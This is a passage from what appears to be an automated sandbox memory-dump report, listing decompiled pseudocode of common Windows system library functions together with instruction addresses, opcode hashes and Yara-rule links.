				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3517b9c; // 0x0
				_t124 = L03444620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03469800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E034695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E034695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L034477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03469910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E034695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3517b9c; // 0x0
									_t92 = L03444620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03469910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0342A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E034BE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E034BE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E034695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x034bb8d9
0x034bb8e4
0x00000000
0x034bb8e6
0x034bb8f3
0x034bb8f5
0x034bb8f5
0x034bb8f8
0x034bb920
0x034bb924
0x034bb936
0x034bb939
0x034bb93d
0x034bb948
0x034bb9a0
0x034bb9a0
0x034bb9a4
0x034bb9bf
0x034bb9c4
0x034bb9c6
0x034bb9cd
0x034bb9d1
0x034bbad4
0x034bbad8
0x034bbada
0x034bbadc
0x034bbadc
0x034bbadf
0x034bbae0
0x034bbae2
0x034bbae4
0x034bbaec
0x034bbaee
0x034bbaf0
0x034bbaf0
0x034bbaec
0x034bbafb
0x034bbafc
0x034bbafe
0x034bbb01
0x034bbb01
0x00000000
0x034bbb06
0x034bb9d7
0x034bb9db
0x034bb9db
0x034bb9de
0x034bb9de
0x034bb9e4
0x034bb9e7
0x034bb9ea
0x034bb9ec
0x034bb9ef
0x034bb9f3
0x034bba1b
0x034bba1b
0x034bba23
0x034bba24
0x034bba27
0x034bba2a
0x034bba2b
0x034bba2e
0x034bba30
0x034bba37
0x034bba3f
0x034bba9c
0x034bbaa2
0x034bbb13
0x034bbb15
0x034bbaae
0x034bbaae
0x034bbab3
0x034bbab5
0x034bbaba
0x034bbac8
0x034bbac8
0x034bbaba
0x034bbacd
0x034bbacf
0x00000000
0x034bbacf
0x034bbb1a
0x00000000
0x034bbb1c
0x034bbaa7
0x034bbb11
0x00000000
0x034bbb11
0x034bbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x034bba41
0x034bba41
0x034bba41
0x034bba58
0x034bba5d
0x034bba62
0x00000000
0x00000000
0x034bba64
0x034bba67
0x034bba68
0x034bba69
0x034bba6c
0x034bba6f
0x034bba71
0x034bba78
0x034bba80
0x00000000
0x00000000
0x034bba90
0x034bba90
0x034bba97
0x00000000
0x034bba97
0x034bb9f5
0x034bb9f7
0x034bb9f7
0x034bb9fa
0x034bba03
0x034bba07
0x034bba0c
0x034bba10
0x034bba17
0x00000000
0x034bb9f7
0x034bb9a6
0x034bb9a8
0x034bb9af
0x034bb9b3
0x00000000
0x00000000
0x034bb9b9
0x00000000
0x034bb9b9
0x034bb94d
0x034bb98f
0x034bb995
0x034bb999
0x034bb960
0x034bb967
0x034bb968
0x034bb96a
0x00000000
0x034bb96a
0x034bb99b
0x034bb99e
0x00000000
0x00000000
0x00000000
0x034bb99e
0x034bb951
0x034bb954
0x034bb95a
0x034bb95e
0x034bb972
0x034bb979
0x034bb97d
0x034bb97f
0x034bb980
0x034bb982
0x034bb984
0x00000000
0x034bb984
0x00000000
0x034bb926
0x00000000
0x034bb926

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4fa0be64971c70d0c3317e8c9ec22eadb9c0e84df887d9e6b26daacefb994e
Instruction ID: 97c2717bb4da9772bcaaa37fe9de276d3f52ac535f8e518ccf0dc82ba9477a41
Opcode Fuzzy Hash: 6f4fa0be64971c70d0c3317e8c9ec22eadb9c0e84df887d9e6b26daacefb994e
Instruction Fuzzy Hash: 20710036600B01EFE731DF25C840F96BBB5EB44720F18492EE6558F6A0DBB4E945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 034252A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E034252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0343EEF0(0x35179a0);
					_t104 =  *0x3518210; // 0xc03698
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0343EB70(_t93, 0x35179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E03469890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0343EEF0(0x35179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0343EB70(0, 0x35179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xc036b002
								_t13 = _t104 + 0xc; // 0xc036a5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0345F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0343EEF0(0x35179a0);
									__eflags =  *0x3518210 - _t104; // 0xc03698
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3518210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000c036
											_t95 =  *((intOrPtr*)( *_t37));
											E034A4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0343EB70(_t95, 0x35179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E034695D0();
											L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E034695D0();
											L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0343EB70(_t93, 0x35179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E034695D0();
										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E034695D0();
										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000c036
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xc036b002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0345F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x034252a5
0x034252ad
0x034252b0
0x034252b3
0x034252b7
0x034252ba
0x034252bf
0x034252c4
0x034252cc
0x00000000
0x00000000
0x034252ce
0x034252d1
0x034252d9
0x034252dd
0x034252e7
0x034252f7
0x034252f9
0x034252fd
0x03480dcf
0x03480dd5
0x03480dd6
0x03480dd7
0x03480dd8
0x03480dd9
0x03480dde
0x03480ddf
0x03480de0
0x03480de1
0x03480de2
0x03480de2
0x03480de5
0x03480dea
0x03480dec
0x03480f60
0x03480f64
0x03480f70
0x03480f76
0x03480f79
0x03480f79
0x00000000
0x03480f64
0x03480df2
0x03480df7
0x03480e04
0x03480e04
0x03480e0d
0x03480e0d
0x03480e10
0x03480e1a
0x03480e1c
0x03480e4c
0x03480e52
0x03480e61
0x03480e67
0x03480e6b
0x03480e70
0x03480e76
0x03480ed7
0x03480edc
0x03480ee0
0x03480ee6
0x03480eea
0x03480eed
0x03480ef0
0x03480ef3
0x03480ef6
0x03480ef9
0x03480efb
0x03480efe
0x03480f01
0x03480f01
0x03480f0b
0x03480f12
0x03480f16
0x03480f18
0x03480f18
0x03480f1b
0x03480f2c
0x03480f31
0x03480f31
0x03480f35
0x03480f39
0x03480f3a
0x03480f3c
0x03480f3c
0x03480f3f
0x03480f50
0x03480f55
0x03480f55
0x03480f59
0x034252eb
0x034252f1
0x034252f1
0x03480e7d
0x03480e84
0x03480e88
0x03480e8a
0x03480e8a
0x03480e8d
0x03480e9e
0x03480ea3
0x03480ea3
0x03480ea7
0x03480eaf
0x03480eb3
0x03480eb9
0x03480eb9
0x03480ebc
0x03480ecd
0x03480ecd
0x00000000
0x03480eb3
0x03480e1e
0x03480e21
0x03480e25
0x03480e2b
0x03480e2f
0x03480e30
0x03480e3a
0x03480e3f
0x03480e41
0x00000000
0x00000000
0x03480e47
0x00000000
0x03480e47
0x03480df9
0x03480dfe
0x00000000
0x00000000
0x00000000
0x03480dfe
0x03425303
0x03425307
0x00000000
0x03425309
0x00000000
0x03425309
0x03425307
0x034252e9
0x034252e9
0x00000000
0x034252e9
0x0342530e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43fe3095390ce6327451db65241ae8cdfa2f76b1aa2f7de162998dfd3a75dbb
Instruction ID: 5ac87cc4025afcae913e61008a21ed66a3e285c22db6851a4e265455f9db116c
Opcode Fuzzy Hash: b43fe3095390ce6327451db65241ae8cdfa2f76b1aa2f7de162998dfd3a75dbb
Instruction Fuzzy Hash: E551BC35205741AFD321EF29C840B2BBBE4BF45710F18095FE4A59F651E770E849CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 03452AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03452AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3518204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3518208; // 0x3518207
				_t8 = _t57 + 0x3518208; // 0x3518207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3518450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x351821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3516d5c; // 0x7fb20654
							_t72 =  *0x3516d5c; // 0x7fb20654
							_t75 =  *0x3516d5c; // 0x7fb20654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3516d5c; // 0x7fb20654
							_t84 =  *0x3516d5c; // 0x7fb20654
							_t87 =  *0x3516d5c; // 0x7fb20654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0346F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x03452ae4
0x03452aec
0x03452aef
0x03452af4
0x03452af7
0x03452afd
0x03452b92
0x03452b92
0x03452b97
0x03452b9c
0x03452b9c
0x03452b03
0x03452b06
0x03452b09
0x03452b09
0x03452b0f
0x03452b15
0x03452b15
0x03452b1b
0x03452b1e
0x03452b21
0x03452b26
0x03452b29
0x03452b81
0x03452b84
0x03452c0e
0x03452c15
0x03452c24
0x03452c24
0x03452b8a
0x03452b8a
0x03452b8a
0x03452b8a
0x03452b90
0x00000000
0x00000000
0x00000000
0x00000000
0x03452b4a
0x03452b4a
0x03452b4d
0x03452b53
0x00000000
0x00000000
0x03452b55
0x03452b58
0x03452bb7
0x03495d1b
0x03495d37
0x03495d47
0x03495d53
0x03452bbd
0x03452bbd
0x03452bbd
0x03452bb7
0x03452b5d
0x03452c2f
0x03495d5b
0x03495d77
0x03495d87
0x03495d93
0x03452c35
0x03452c35
0x03452c35
0x03452c2f
0x03452b65
0x03452b9f
0x03452ba2
0x03452b67
0x03452b67
0x03452b69
0x03452b6b
0x03452b6e
0x03452bc9
0x03452bcc
0x03452bcf
0x03452bd4
0x03452bd6
0x03452bd6
0x03452bdb
0x03452c02
0x03452c05
0x03452c07
0x00000000
0x03452c07
0x03452be0
0x03452c00
0x03452c3f
0x03452c3f
0x00000000
0x03452c00
0x03452be5
0x03452be7
0x03452bec
0x03452bf4
0x03452bf6
0x00000000
0x03452bf6
0x03452b70
0x03452b76
0x03452b2b
0x03452b2b
0x03452b2d
0x03452b2f
0x03452b32
0x03452b35
0x03452b3a
0x00000000
0x03452b40
0x03452b43
0x03452b45
0x03452b47
0x03452b4a
0x03452b4d
0x03452b53
0x00000000
0x00000000
0x00000000
0x03452b53
0x03452b78
0x03452b78
0x03452b7b
0x03452b7e
0x00000000
0x03452b7e
0x03452b76
0x03452ba5
0x03452ba5
0x03452ba8
0x03452bad
0x00000000
0x00000000
0x03452baf
0x03452baf
0x03452bc2
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157a73e2ae3b98c9a34ad701d986b315bbf548c8cda6f373527274cd3ff38d11
Instruction ID: 21c4a6c12a4564934454d7f3e1972a59ca886afb4ffacdd691beec90ac50ca2e
Opcode Fuzzy Hash: 157a73e2ae3b98c9a34ad701d986b315bbf548c8cda6f373527274cd3ff38d11
Instruction Fuzzy Hash: 59519076E001258FCB18DF1DC4809BDB7B1BB88700716895BFC56AF326D770AA52CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0344DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0344DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0342CC50(E03424510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03447D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E034F8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03442280(_t58, _v44);
						E0344DD82(_v44, _t102, _t98);
						E0344B944(_t102, _v5);
						return E0343FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3518628; // 0x0
							_v28 = _t67;
							_t68 =  *0x351862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3518628; // 0x0
						_t105 = _v28;
						_t80 =  *0x351862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x34efb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0344dbe9
0x0344dbf2
0x0344dbf7
0x0344dbf9
0x0344dbfc
0x0344dc00
0x0344dc03
0x0344dc14
0x0344dd54
0x0344dd54
0x0344dd54
0x0344dc18
0x0344dc1d
0x0344dc1d
0x0344dc32
0x0344dc3b
0x0344dc3e
0x0344dc46
0x0344dd5b
0x0344dd62
0x0344dd64
0x0344dd67
0x0344dd69
0x0344dd6b
0x0344dd6e
0x0344dd70
0x0344dd73
0x0344dd73
0x00000000
0x0344dc4c
0x0344dc4e
0x03493ae3
0x03493ae8
0x03493aea
0x0344dce7
0x0344dce9
0x0344dcec
0x0344dcee
0x0344dcf0
0x0344dcf3
0x0344dcf5
0x03493af2
0x03493af5
0x03493af5
0x0344dd06
0x0344dd08
0x0344dd0b
0x0344dd12
0x03493b08
0x0344dd18
0x0344dd18
0x0344dd18
0x0344dd20
0x0344dd23
0x03493b16
0x03493b16
0x0344dd29
0x0344dd2d
0x0344dd36
0x0344dd40
0x0344dd51
0x0344dd51
0x0344dc54
0x0344dc59
0x0344dc59
0x0344dc5e
0x0344dc5e
0x0344dc63
0x0344dc66
0x0344dc6b
0x0344dc78
0x0344dc7b
0x0344dc81
0x0344dc81
0x0344dc83
0x0344dc89
0x00000000
0x00000000
0x0344dd7b
0x0344dd7b
0x0344dc8f
0x0344dc8f
0x0344dc92
0x0344dc99
0x0344dc9f
0x0344dca5
0x0344dcaa
0x0344dcaa
0x0344dcb3
0x0344dcb8
0x0344dcbb
0x0344dcc1
0x0344dccf
0x0344dcd2
0x0344dcd5
0x0344dcd7
0x0344dcda
0x0344dcdc
0x0344dcdc
0x0344dce2
0x0344dce4
0x00000000
0x0344dce4

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b752730e3d1802c8bec2511d9b4c5200c45581a9cb85e31a22a3a90422343800
Instruction ID: b6943e99d7b4de4ee8670cabb2af048eb86687dfc610f749d95b21c0ae6fa3e0
Opcode Fuzzy Hash: b752730e3d1802c8bec2511d9b4c5200c45581a9cb85e31a22a3a90422343800
